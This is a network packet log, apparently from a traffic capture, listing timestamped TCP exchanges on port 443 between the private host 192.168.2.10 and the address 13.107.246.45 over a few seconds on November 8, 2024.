Nov 8, 2024 16:15:59.805783987 CET	443	63297	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.806217909 CET	63297	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.806224108 CET	443	63297	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.862535954 CET	443	63295	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.862618923 CET	443	63295	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.862667084 CET	63295	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.862853050 CET	63295	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.862869978 CET	443	63295	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.862880945 CET	63295	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.862890959 CET	443	63295	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.865901947 CET	61990	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.865959883 CET	443	61990	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.866044044 CET	61990	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.866254091 CET	61990	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.866267920 CET	443	61990	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.881664991 CET	443	63296	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.881701946 CET	443	63296	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.881751060 CET	443	63296	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.881875992 CET	63296	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.882148027 CET	63296	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.882172108 CET	443	63296	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.882186890 CET	63296	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.882195950 CET	443	63296	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.884903908 CET	61991	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.884936094 CET	443	61991	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.885010958 CET	61991	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.885180950 CET	61991	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.885194063 CET	443	61991	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.935983896 CET	443	63297	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.936064005 CET	443	63297	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.936151981 CET	63297	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.936378956 CET	63297	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.936407089 CET	443	63297	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.936419964 CET	63297	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.936424017 CET	443	63297	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.939557076 CET	61992	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.939615011 CET	443	61992	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.939711094 CET	61992	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.939881086 CET	61992	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.939893961 CET	443	61992	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.946741104 CET	443	61987	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.947246075 CET	61987	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.947268963 CET	443	61987	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:59.947693110 CET	61987	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:59.947700977 CET	443	61987	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.076843023 CET	443	61987	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.076874018 CET	443	61987	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.076924086 CET	443	61987	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.077042103 CET	61987	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.077042103 CET	61987	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.077301025 CET	61987	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.077323914 CET	443	61987	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.077337980 CET	61987	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.077344894 CET	443	61987	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.080511093 CET	61993	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.080555916 CET	443	61993	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.080626011 CET	61993	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.080848932 CET	61993	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.080866098 CET	443	61993	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.527717113 CET	443	61989	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.528131008 CET	61989	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.528153896 CET	443	61989	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.528695107 CET	61989	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.528702021 CET	443	61989	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.598841906 CET	443	61990	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.599345922 CET	61990	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.599381924 CET	443	61990	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.599807024 CET	61990	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.599812984 CET	443	61990	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.660593987 CET	443	61991	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.661197901 CET	61991	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.661221027 CET	443	61991	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.661639929 CET	61991	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.661644936 CET	443	61991	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.672569036 CET	443	61992	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.674233913 CET	61992	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.674252987 CET	443	61992	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.674628973 CET	61992	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.674634933 CET	443	61992	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.728410959 CET	443	61990	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.728607893 CET	443	61990	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.728665113 CET	443	61990	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.728734970 CET	61990	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.728765965 CET	61990	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.728874922 CET	61990	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.728893042 CET	443	61990	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.728903055 CET	61990	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.728908062 CET	443	61990	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.731470108 CET	61994	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.731503010 CET	443	61994	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.731584072 CET	61994	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.731736898 CET	61994	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.731745958 CET	443	61994	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.801047087 CET	443	61991	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.801125050 CET	443	61991	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.801182032 CET	61991	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.801405907 CET	61991	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.801425934 CET	443	61991	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.801436901 CET	61991	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.801443100 CET	443	61991	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.804112911 CET	61995	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.804156065 CET	443	61995	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.804208994 CET	443	61992	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.804220915 CET	61995	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.804238081 CET	443	61992	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.804290056 CET	443	61992	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.804330111 CET	61992	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.804425955 CET	61995	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.804438114 CET	443	61995	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.804596901 CET	61992	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.804596901 CET	61992	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.804610014 CET	443	61992	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.804620028 CET	443	61992	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.806838036 CET	61996	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.806874990 CET	443	61996	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.806962967 CET	61996	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.807100058 CET	61996	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.807113886 CET	443	61996	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.812720060 CET	443	61993	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.813188076 CET	61993	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.813215017 CET	443	61993	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.813653946 CET	61993	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.813661098 CET	443	61993	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.938997030 CET	443	61989	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.939074993 CET	443	61989	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.939141989 CET	61989	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.939342022 CET	61989	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.939369917 CET	443	61989	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.939384937 CET	61989	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.939390898 CET	443	61989	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.942023039 CET	61997	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.942074060 CET	443	61997	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.942158937 CET	61997	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.942287922 CET	61997	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.942311049 CET	443	61997	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.945215940 CET	443	61993	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.945266962 CET	443	61993	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.945324898 CET	61993	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.945339918 CET	443	61993	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.945362091 CET	443	61993	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.945405960 CET	61993	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.945513964 CET	61993	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.945527077 CET	443	61993	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.945540905 CET	61993	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.945545912 CET	443	61993	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.947752953 CET	61998	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.947812080 CET	443	61998	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:00.948024035 CET	61998	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.948193073 CET	61998	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:00.948205948 CET	443	61998	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.471255064 CET	443	61994	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.471832037 CET	61994	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.471844912 CET	443	61994	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.472307920 CET	61994	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.472311974 CET	443	61994	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.545741081 CET	443	61995	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.546252012 CET	61995	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.546278000 CET	443	61995	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.546823025 CET	61995	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.546833992 CET	443	61995	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.574068069 CET	443	61996	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.574520111 CET	61996	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.574558020 CET	443	61996	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.575155020 CET	61996	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.575162888 CET	443	61996	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.814974070 CET	443	61994	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.815005064 CET	443	61994	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.815051079 CET	443	61994	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.815066099 CET	61994	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.815114021 CET	61994	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.815162897 CET	443	61995	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.815246105 CET	443	61995	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.815285921 CET	61995	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.815371037 CET	61994	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.815392971 CET	443	61994	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.815404892 CET	61994	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.815412045 CET	443	61994	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.816665888 CET	61995	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.816684008 CET	443	61995	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.816695929 CET	61995	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.816701889 CET	443	61995	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.817492962 CET	443	61997	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.817548037 CET	443	61998	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.819273949 CET	62000	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.819298029 CET	443	62000	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.819350958 CET	62000	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.819433928 CET	62001	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.819458961 CET	443	62001	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.819508076 CET	62001	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.819783926 CET	61997	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.819799900 CET	443	61997	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.820249081 CET	61997	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.820254087 CET	443	61997	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.820527077 CET	61998	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.820564985 CET	443	61998	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.820930004 CET	61998	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.820938110 CET	443	61998	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.821086884 CET	62000	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.821104050 CET	443	62000	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.821182966 CET	62001	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.821197033 CET	443	62001	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.944042921 CET	443	61996	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.944072962 CET	443	61996	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.944113016 CET	443	61996	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.944269896 CET	61996	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.944271088 CET	61996	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.944386005 CET	61996	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.944410086 CET	443	61996	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.944421053 CET	61996	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.944427013 CET	443	61996	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.947189093 CET	62002	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.947221041 CET	443	62002	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.947282076 CET	62002	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.947515965 CET	62002	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.947530985 CET	443	62002	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.950320005 CET	443	61997	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.950506926 CET	443	61997	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.950561047 CET	61997	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.950628042 CET	61997	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.950644016 CET	443	61997	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.950654984 CET	61997	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.950661898 CET	443	61997	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.951750040 CET	443	61998	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.951776981 CET	443	61998	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.951812983 CET	443	61998	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.951823950 CET	61998	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.951857090 CET	61998	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.951994896 CET	61998	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.952003002 CET	443	61998	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.952013016 CET	61998	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.952017069 CET	443	61998	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.958231926 CET	62003	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.958261013 CET	443	62003	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.958309889 CET	62003	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.958440065 CET	62003	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.958447933 CET	443	62003	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.963140965 CET	62004	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.963157892 CET	443	62004	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:01.963222980 CET	62004	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.963448048 CET	62004	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:01.963460922 CET	443	62004	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.679887056 CET	443	62003	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.680351973 CET	62003	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.680371046 CET	443	62003	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.680803061 CET	62003	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.680807114 CET	443	62003	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.690094948 CET	443	62002	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.691230059 CET	62002	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.691246986 CET	443	62002	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.691677094 CET	62002	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.691684008 CET	443	62002	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.696091890 CET	443	62004	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.698560953 CET	62004	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.698574066 CET	443	62004	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.698987007 CET	62004	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.698992968 CET	443	62004	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.809801102 CET	443	62003	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.809837103 CET	443	62003	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.809889078 CET	443	62003	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.809961081 CET	62003	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.810003996 CET	62003	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.810154915 CET	62003	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.810178995 CET	443	62003	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.810190916 CET	62003	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.810197115 CET	443	62003	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.812737942 CET	62005	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.812783003 CET	443	62005	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.812869072 CET	62005	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.813014030 CET	62005	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.813030005 CET	443	62005	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.819271088 CET	443	62002	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.819338083 CET	443	62002	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.819437027 CET	62002	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.819663048 CET	62002	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.819663048 CET	62002	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.819680929 CET	443	62002	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.819690943 CET	443	62002	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.822184086 CET	62006	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.822217941 CET	443	62006	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.822319984 CET	62006	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.822427034 CET	62006	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.822443008 CET	443	62006	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.826837063 CET	443	62004	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.827042103 CET	443	62004	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.827124119 CET	62004	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.827263117 CET	62004	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.827274084 CET	443	62004	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.827284098 CET	62004	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.827289104 CET	443	62004	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.829571962 CET	62007	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.829607010 CET	443	62007	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:02.829670906 CET	62007	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.829809904 CET	62007	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:02.829823017 CET	443	62007	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.544460058 CET	443	62005	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.545047998 CET	62005	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.545084000 CET	443	62005	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.545521975 CET	62005	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.545533895 CET	443	62005	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.564434052 CET	443	62006	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.564894915 CET	62006	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.564910889 CET	443	62006	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.565368891 CET	62006	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.565373898 CET	443	62006	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.571667910 CET	443	62007	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.572035074 CET	62007	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.572056055 CET	443	62007	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.572721004 CET	62007	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.572726011 CET	443	62007	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.596651077 CET	443	62000	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.596978903 CET	62000	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.596990108 CET	443	62000	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.597374916 CET	62000	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.597381115 CET	443	62000	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.675251007 CET	443	62005	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.678316116 CET	443	62005	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.678381920 CET	62005	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.678447962 CET	62005	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.678467989 CET	443	62005	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.678481102 CET	62005	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.678487062 CET	443	62005	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.681251049 CET	62008	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.681276083 CET	443	62008	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.681353092 CET	62008	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.681612015 CET	62008	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.681631088 CET	443	62008	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.695528984 CET	443	62006	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.695565939 CET	443	62006	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.695611954 CET	443	62006	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.695611000 CET	62006	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.695652008 CET	62006	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.695832968 CET	62006	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.695848942 CET	443	62006	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.695861101 CET	62006	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.695867062 CET	443	62006	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.698287010 CET	62009	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.698332071 CET	443	62009	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:03.698399067 CET	62009	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.698522091 CET	62009	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:03.698535919 CET	443	62009	13.107.246.45	192.168.2.10
